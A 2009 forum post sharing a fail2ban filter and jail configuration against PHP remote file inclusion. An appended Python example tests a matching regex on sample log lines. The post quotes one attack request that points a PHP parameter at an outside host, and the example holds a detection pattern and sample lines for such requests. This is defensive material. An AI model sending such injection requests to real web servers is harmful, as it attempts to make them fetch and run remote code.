bernholdt
4th August 2009, 10:48
Stumbled across this guide, thought I would share it with you all.
Aren’t you just tired of the massive amount of PHP Remote Injection attacks registered in your access log? You know, the ones that look like this:
GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm?
Just make sure you save the attached file to your /etc/fail2ban/filter.d directory, then add this block to jail.conf and restart fail2ban:
[php-url-fopen]
enabled = true
port = http,https
filter = php-url-fopen
logpath = /var/www/*/logs/access_log
maxretry = 1
Source : http://blogs.buanzo.com.ar/2009/04/fail2ban-filter-for-php-injection-attacks.html
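Added example, not part of the original post and not the attached filter: a Python check of what a filter of this kind would match and which hosts maxretry = 1 would ban. The failregex, the simplified <HOST> stand-in, the function name and the log lines are all assumptions made for the illustration.

```python
import re
from collections import Counter

# Assumed failregex in fail2ban style; NOT the filter attached to the post.
# Flags a request line whose query string carries a URL as a parameter value,
# written plainly (http://) or percent-encoded (http%3A%2F%2F).
FAILREGEX = (r'^<HOST> \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) \S*\?\S*='
             r'(?:https?|ftp)(?::|%3A)(?:/|%2F){2}\S* HTTP/[\d.]+"')

# fail2ban expands <HOST> into a host-capturing group; simplified stand-in.
PATTERN = re.compile(FAILREGEX.replace('<HOST>', r'(?P<host>[\w.:-]+)'), re.I)

# Constructed access_log lines (documentation IP ranges), combined log format.
SAMPLE_LOG = [
    # The request shown in the post.
    '203.0.113.7 - - [04/Aug/2009:10:41:02 +0200] "GET /index.php?n='
    'http://eatmyfood.hostinginfive.com/pizza.htm? HTTP/1.1" 404 209 "-" "-"',
    # Ordinary page view: no URL in the query string.
    '192.0.2.50 - - [04/Aug/2009:10:41:05 +0200] '
    '"GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Legitimate redirect parameter: also matches (false positive).
    '198.51.100.23 - - [04/Aug/2009:10:42:11 +0200] "GET /login.php?return='
    'http://www.example.com/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    # Same kind of request as the first, percent-encoded in the log.
    '203.0.113.9 - - [04/Aug/2009:10:43:30 +0200] "GET /index.php?n='
    'http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 404 209 "-" "-"',
    # URL appears only in the Referer field, not the request line: no match.
    '192.0.2.50 - - [04/Aug/2009:10:44:00 +0200] "GET /about.php HTTP/1.1" '
    '200 1200 "http://www.example.com/?q=http://example.org/" "Mozilla/5.0"',
]


def banned_hosts(lines, maxretry=1):
    """Hosts whose matching-request count reaches maxretry (findtime ignored)."""
    hits = Counter(m.group('host') for m in map(PATTERN.match, lines) if m)
    return sorted(h for h, n in hits.items() if n >= maxretry)


if __name__ == '__main__':
    print('maxretry=1:', banned_hosts(SAMPLE_LOG, 1))
    print('maxretry=2:', banned_hosts(SAMPLE_LOG, 2))
```

With maxretry = 1 the visitor following a redirect-style link is banned along with the two scanners, so run the real filter over your own access_log with fail2ban-regex before enabling the jail.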